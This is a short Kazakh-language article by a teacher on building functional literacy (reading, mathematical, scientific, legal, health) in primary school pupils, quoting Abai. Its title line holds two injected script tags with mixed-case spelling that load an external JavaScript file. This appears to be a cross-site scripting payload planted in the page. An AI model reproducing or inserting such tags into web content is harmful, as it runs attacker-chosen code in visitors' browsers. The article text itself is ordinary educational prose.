Бастауыш сынып оқушыларының функционалдық сауаттылығын дамыту<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
Егеменді еліміздің өсіп келе жатқан ұрпағын ойлы да іскер, жігерлі де батыл, өзіне-өзі сенімді интеллектуалдық деңгейі биік, дүние танымы қалыптасқан азамат етіп тәрбиелеуде мектептің алатын орны ерекше. Функционалдық сауаттылықты қалыптастыру қазіргі таңда оқыту жүйесіне қойылып отырған әлеуметтік сұраныс талаптарымен сай келу үшін бастауыш сыныптардан бастап оқушының оқу, жазу сауаттылығын , жаратылыстану ғылымындағы сауаттылығын, математикалық сауаттылығын, компьютерлік сауаттылығын, денсаулық мәселесіндегі сауаттылықты, құқықтық сауаттылығын қалыптастыруға бағытталған арнайы жұмыс арқылы оң нәтижелерге қол жеткізуге болады. Осы орайда ұлы ұстаз Абайдың «Адам ата-анадан туғанда есті болып тумайды: естіп, көріп, ұстап, татып ескерсе, дүниедегі жақсы, жаманды таниды-дағы, сондайдан білгені, көргені көп болған адам білімді болады» деген дана сөздерінен адам табиғатының болмысы мен танымының қалыптасуының өзі осы ізбен жүретінін байқауға болады. Егер оқу үдерісі, балаларға білім, білік, дағдыларды игерту осы ұстанымға негізделсе, нәтижелі болатыны анық.
Аширханова Б.К.